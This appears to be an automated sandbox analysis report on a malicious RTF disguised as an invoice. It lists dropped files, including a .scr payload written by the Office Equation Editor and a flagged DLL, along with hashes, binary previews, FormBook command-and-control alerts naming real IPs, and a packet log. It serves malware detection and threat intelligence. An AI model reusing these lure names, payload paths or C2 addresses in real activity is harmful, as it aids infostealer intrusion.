                                                                                        Preview:9.3.7.7.9.4.7.5.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{725F5B91-09B4-4FAB-9821-1827AB9950C1}.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):1024
                                                                                        Entropy (8bit):0.05390218305374581
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ol3lYdn:4Wn
                                                                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                        Malicious:false
                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7C318C98-9EA9-493E-981E-0BA44CA65E04}.tmp

                                                                                        Download File
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):1536
                                                                                        Entropy (8bit):1.3586208805849456
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbo:IiiiiiiiiifdLloZQc8++lsJe1MzT
                                                                                        MD5:DC5C783FAACABDF6250338F134E80E44
                                                                                        SHA1:AF4AF0F70D8D809B0252E503D50E459E638203F1
                                                                                        SHA-256:BB4089A598ED418D3534E8AC8B190A291026C57D5750306619D381FBEF66FD57
                                                                                        SHA-512:9EE918CCEF9E3B9ABF856BCAE07643A4827629A55B430A20B9659AB4FBECCE6C204676678EB2D0D07E83C317F089D30CDB04DE994C1365E193CC3C8D4B6CCA11
                                                                                        Malicious:false
                                                                                        Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\13d6pS3

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\dfrgui.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                                                        Category:dropped
                                                                                        Size (bytes):77824
                                                                                        Entropy (8bit):1.133993246026424
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                                                        MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                                                        SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                                                        SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                                                        SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\9l3pz.zip

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\dfrgui.exe
                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                        Category:dropped
                                                                                        Size (bytes):432857
                                                                                        Entropy (8bit):7.998752412719792
                                                                                        Encrypted:true
                                                                                        SSDEEP:6144:kTIVVH3d4R4Xwi0y4OL5F3xGfi/CrsMWe6Y/Q3bQKTYTT1cAHKl0HIX0SXahmW:DVv4iXwi0yVL5FxGfjW/4dThmW
                                                                                        MD5:82949903C2FB1A5EDA9181B96800A472
                                                                                        SHA1:B1796BD0C2E7EAED79D1CD8D5DD90E02D491B43D
                                                                                        SHA-256:21EBD12C1AA68AA18F4BFDD7AE30D6D321747EE9D91E1D07926D11F2AE84A101
                                                                                        SHA-512:C12C980A6778A27F0F9F4266DD8432D5D3F12F3C2A8FA7F760381B3B37C662B71D39274C642E121B78542064E6C9CEA48217F808B4AB6A087EB15C27FA02E704
                                                                                        Malicious:false
                                                                                        Preview:PK........$..H........=.......sqlite3.defUT...TM<WTM<Wux.........d.......6.@..73.....9.$..T.....b....R.......H..6..........~j...$...&"L.....T.,.).......O<....iUV.KO...b..sUx0...W..{c....<...8[\.5p.....l..]xa ..|.)Q..WJ......I......*t.6...F.<(...i.G..I..p.v..x.KO.n..7..}...h..Fe....)...*.$.......51f(..(.t...ZD.w...,/..=.*.....#)....p.Q..md.q..7\@.x..e....)Q....iQ..9.6u....ux]}.9YE....'O..I:cT...S.+..^.c..B...'.k.0.f.].F.l...5_....T.../.t.N.......|..9..%.&..>...........N..d...dEw......H*.r..g..3. .\...L.....u.'.....O.V..N,'.j...-...{..&..u"q=..[...D.'QW,..5..Px.I.)+...WK.y...B.....GV>.fF).G.u.#.w..X].F..F.G......K{;A.....q..?..q7.j..Nofr.V...oV.......N$u.I`...^.v.a..^....=^wmr..(a>uF....\.{}.....,.\....h.WX.....,.Lw..X.........2.{...z...$...9r9....m..@.Qv..!...2y./*..@zD.^.55..hA.;...W....)$>.xb.i....s3).UG..F..\]YH3.....N.x...;|}.=......a..8...l.Z.s...Fn.....p<...&8S....I.4...pIqq..UA..d..+"..8....qr....@.*.m.y.<D..~..bR..N..\..

                                                                                        C:\Users\user\AppData\Local\Temp\sqlite3.def

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\dfrgui.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):4925
                                                                                        Entropy (8bit):4.3493143051273
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:GcuN4gR+7Oc6XRMcCM3KVGOF95BlitvrmNHY0ac:E4Q+7Oc6JKVBF95ivrmNHcc
                                                                                        MD5:BCAF2708719FC3D59CB1D3D2319D185D
                                                                                        SHA1:A9B5C2764FB6FFB46937288ACE2AAE536905EEDC
                                                                                        SHA-256:F5BF6F9B6A166D3BAD9BB2B34BAC5C4E9293978CD5631C059710483555A1910E
                                                                                        SHA-512:138623EC473BDB1C10E65051B4040E2BDB8C3B89989B2628991BDD9B3EA4E427DD2EF290731413422065E6AB9237E84C918BAB0C9A23F7C9959B307AFBE24A2D
                                                                                        Malicious:false
                                                                                        Preview:EXPORTS.sqlite3_aggregate_context.sqlite3_aggregate_count.sqlite3_auto_extension.sqlite3_backup_finish.sqlite3_backup_init.sqlite3_backup_pagecount.sqlite3_backup_remaining.sqlite3_backup_step.sqlite3_bind_blob.sqlite3_bind_blob64.sqlite3_bind_double.sqlite3_bind_int.sqlite3_bind_int64.sqlite3_bind_null.sqlite3_bind_parameter_count.sqlite3_bind_parameter_index.sqlite3_bind_parameter_name.sqlite3_bind_text.sqlite3_bind_text16.sqlite3_bind_text64.sqlite3_bind_value.sqlite3_bind_zeroblob.sqlite3_bind_zeroblob64.sqlite3_blob_bytes.sqlite3_blob_close.sqlite3_blob_open.sqlite3_blob_read.sqlite3_blob_reopen.sqlite3_blob_write.sqlite3_busy_handler.sqlite3_busy_timeout.sqlite3_cancel_auto_extension.sqlite3_changes.sqlite3_clear_bindings.sqlite3_close.sqlite3_close_v2.sqlite3_collation_needed.sqlite3_collation_needed16.sqlite3_column_blob.sqlite3_column_bytes.sqlite3_column_bytes16.sqlite3_column_count.sqlite3_column_database_name.sqlite3_column_database_name16.sqlite3_column_decltype.sqlite3_co

                                                                                        C:\Users\user\AppData\Local\Temp\sqlite3.dll

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\dfrgui.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):826775
                                                                                        Entropy (8bit):6.520580307753605
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:QJCoOO8Mh2X8Vy0JHfv3kDpigeLKh2R6fFQVp:QL8MFVym/kDpitLKZy
                                                                                        MD5:16A1612789DC9063EBEA1CB55433B45B
                                                                                        SHA1:438FDE2939BBB9B5B437F64F21C316C17CE4A7F6
                                                                                        SHA-256:6DEAEC2F96C8A1C20698A93DDD468D5447B55AC426DC381EEF5D91B19953BB7B
                                                                                        SHA-512:D727CE8CD793C09A8688ACCB7A2EB5D8F84CC198B8E9D51C21E2DFB11D850F3AC64A58D07FF7FE9D1A2FDB613567E4790866C08A423176216FF310BF24A5A7E3
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                        Joe Sandbox View:
                                                                                        • Filename: 2rv55ZT4QK, Detection: malicious, Browse
                                                                                        • Filename: dWnj3zLFc4.exe, Detection: malicious, Browse
                                                                                        • Filename: dWnj3zLFc4.exe, Detection: malicious, Browse
                                                                                        • Filename: PAYMENT_DETAILS.xls, Detection: malicious, Browse
                                                                                        • Filename: sfk_setup.exe, Detection: malicious, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...TM<W....*......!.....j.........................a.........................`.......#........ .........................................x.......................@/..................................................................................text...,i.......j..................`.P`.data................p..............@.`..rdata..............................@.`@.bss..................................`..edata...............f..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...x...........................@.0..reloc..@/.......0..................@.0B/4........... ......................@.@B/19.........0......................@..B/31..................j..............@..B/45.................................@..B/57.................................@.0B/70.....i.... ..........

                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Beauty_Stem_Invoice.LNK

                                                                                        Download File
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:06 2023, mtime=Fri Aug 11 15:42:06 2023, atime=Tue May 14 06:36:02 2024, length=372498, window=hide
                                                                                        Category:dropped
                                                                                        Size (bytes):1059
                                                                                        Entropy (8bit):4.586105936773367
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:8pgw/XT9Obky5/t+AXiNe7ocX1aAX4Dv3qBk7N:86w/XTAbNnXMNclTXnBiN
                                                                                        MD5:E1A09E9BF9A4051875305F223E5CBCE1
                                                                                        SHA1:8502A73DFBB886F038BDB851D659EC1729365B63
                                                                                        SHA-256:DD80537FA9C661DC309D6E1D58F7B988E344C612EDDF0F10AFF8F53FB8C0579A
                                                                                        SHA-512:6CBD311200969C35DBF412A24F354767971B089F7B6320968245C12858CECBCB713042B26863A83167A0B84F4F91EA9F4EA4B8731FC60C10444BD31D4975D8AA
                                                                                        Malicious:false
                                                                                        Preview:L..................F.... ....e..r....e..r.... B_................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X}<..user.8......QK.X.X}<*...&=....U...............A.l.b.u.s.....z.1......WE...Desktop.d......QK.X.WE.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2......X.< .BEAUTY~1.DOC..\.......WD..WD.*.........................B.e.a.u.t.y._.S.t.e.m._.I.n.v.o.i.c.e...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\927537\Users.user\Desktop\Beauty_Stem_Invoice.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.B.e.a.u.t.y._.S.t.e.m._.I.n.v.o.i.c.e...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......927537..........D_....3N.

                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                        Download File
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                        File Type:Generic INItialization configuration [folders]
                                                                                        Category:dropped
                                                                                        Size (bytes):72
                                                                                        Entropy (8bit):4.7476142798233285
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:M1OHsLbGAd6lm4GHsLbGAd6lv:MucGADcGAC
                                                                                        MD5:DFF2B71405C0A63DD05066749F1A92E2
                                                                                        SHA1:BF9D1F297E732585405AA6058F08AAB2F09F07A7
                                                                                        SHA-256:196A07C1BD8771C4DB919553C7A00D1E4BFD8E251BBA89B09229BF33F00ADFEA
                                                                                        SHA-512:4E5E4A3833A6F2D5824CDA9881526CCAB4D7E73345B3F4A9BA9249A5C1C4223B42CD857DAAE9C1796FF1952BBD3546E19E35357533A14B9FBD9F287D41EB35BD
                                                                                        Malicious:false
                                                                                        Preview:[doc]..Beauty_Stem_Invoice.LNK=0..[folders]..Beauty_Stem_Invoice.LNK=0..

                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                        Download File
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):162
                                                                                        Entropy (8bit):2.4797606462020307
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                                                        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                                                        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                                                        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                                                        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                                                        Malicious:false
                                                                                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                        C:\Users\user\AppData\Roaming\op33779.scr

                                                                                        Download File
                                                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):744448
                                                                                        Entropy (8bit):7.50104957045175
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:LIOQjIdmUO4AZ2bg/AKGsFxFW7sDSNUmUen:EOQE/3bzKGsLgOS+mUen
                                                                                        MD5:E81883368313FC5B3CC4D1F1F1889827
                                                                                        SHA1:13CA55C0A193F66678855229AFBF82A95A6D30DE
                                                                                        SHA-256:481FE3840D515D4D19D6FB16143AA6845B9DF798FE8D6C843297D34219CB14D0
                                                                                        SHA-512:A6136772F3D20747F59BEEC0CF7BDFA9901A47338FF34446A790A4AFA8F6621BB8A4F4382499D6FB85DEBFBFACE883733C8B8EEF740B7E3CDBF2D78110045660
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....\...............0..P...........o... ........@.. ....................................@.................................4o..W.......:............................................................................ ............... ..H............text....O... ...P.................. ..`.rsrc...:............R..............@..@.reloc...............Z..............@..B................po......H.......................Hq..Lc..........................................&.(9.....*".......*J.~....t....(>...&*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*".(9....*.(.........(?...~....~....(....o@...oA....#......*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*>..(E.....}F...*:.(G.....}F...*>..(H.....}F...*B...(I.....}F...*>..(J....

                                                                                        C:\Users\user\Desktop\~$auty_Stem_Invoice.doc

                                                                                        Download File
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):162
                                                                                        Entropy (8bit):2.4797606462020307
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                                                        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                                                        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                                                        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                                                        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                                                        Malicious:false
                                                                                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:Rich Text Format data, version 1
                                                                                        Entropy (8bit):3.4335457524773707
                                                                                        TrID:
                                                                                        • Rich Text Format (5005/1) 55.56%
                                                                                        • Rich Text Format (4004/1) 44.44%
                                                                                        File name:Beauty_Stem_Invoice.doc
                                                                                        File size:372'498 bytes
                                                                                        MD5:85ce759ae69a9334137db1334bf51bd0
                                                                                        SHA1:b10f803d0140ca39c4510249e3931b2347b05522
                                                                                        SHA256:bec93506d8753d87a08aae20208e8b763891bd0b7c86cd82121fb0b03feacd28
                                                                                        SHA512:9bb6fbd30e09538895184ef585810e63ea605513caa625ec883d66b403c839e818703c70e3a024093cd9aed5f690e95ec37becba96e20ed3bc020f97b5f5bea3
                                                                                        SSDEEP:6144:JwAYwAYwAYwAYwAYwAYwAYwAYwAYwAWsOXnderG:h
                                                                                        TLSH:6084AD2DD34B02598F620377AB571E5141BDBA7EF38552B1302C537933EAC39A2252BE
                                                                                        File Content Preview:{\rtf1..{\*\5fNNaHRazDOljZySe24l27MamQ18sMue20qVkGBQOEf0ntUTnudiJrQXVcPAEuL2jKencKsb2mZZBUObu7NNlKXaAElWrtkmbNUJ7mheKenUnfpMNSxkIprGB2kEgaHP2xz39so6fcylXhyGdj2robY6xq1KaG5TTro4cuMTSSlRJqyr5hGmDxlesQFqTDJUHpcNRAVJ7xpY3Qyg78JVPBdPNX4pGj8ztg42VvP83to8dg9F9qp

                                                                                        File Icon

                                                                                        Icon Hash:2764a3aaaeb7bdbf

                                                                                        Static RTF Info

                                                                                        Objects

                                                                                        IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                        000015926hno

                                                                                        Network Behavior

                                                                                        Snort IDS Alerts

                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                        05/14/24-09:38:13.513349TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24917780192.168.2.2291.195.240.19
                                                                                        05/14/24-09:37:54.389325TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24917380192.168.2.22194.9.94.86
                                                                                        05/14/24-09:36:48.683420TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24916480192.168.2.2266.96.161.166
                                                                                        05/14/24-09:37:39.935286TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24916980192.168.2.2254.38.220.85

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        May 14, 2024 09:36:06.531761885 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:06.531797886 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:06.531863928 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:06.541199923 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:06.541230917 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:06.865190029 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:06.865354061 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:06.870800018 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:06.870815992 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:06.871293068 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:06.871345997 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:06.957510948 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.004122019 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.559781075 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.559885025 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.559916973 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.559973955 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.559994936 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.560000896 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.560029984 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.560043097 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.560064077 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.560069084 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.560075998 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.560103893 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.560116053 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.560121059 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.560146093 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.560188055 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.560194016 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.563291073 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.566591978 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.724236012 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.724294901 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.724318981 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.724361897 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.724366903 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.724407911 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.724662066 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.724701881 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.724708080 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.724745989 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.724750996 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.724783897 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.725440979 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.725486994 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.725495100 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.725537062 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.725541115 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.725574017 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.726365089 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.726407051 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.726419926 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.726457119 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.726463079 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.726495028 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.726499081 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.726535082 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.727283001 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.727339983 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.727346897 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.727361917 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.727386951 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.727410078 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.727416039 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.727458954 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.728194952 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.728235960 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.728244066 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.728285074 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.892231941 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.892293930 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.892297029 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.892327070 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.892342091 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.892363071 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.892677069 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.892718077 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.892724037 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.892759085 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.893271923 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.893322945 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.893332005 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.893366098 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.893371105 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.893405914 CEST49163443192.168.2.22172.67.175.222
                                                                                        May 14, 2024 09:36:07.894078016 CEST44349163172.67.175.222192.168.2.22
                                                                                        May 14, 2024 09:36:07.894117117 CEST49163443192.168.2.22172.67.175.222
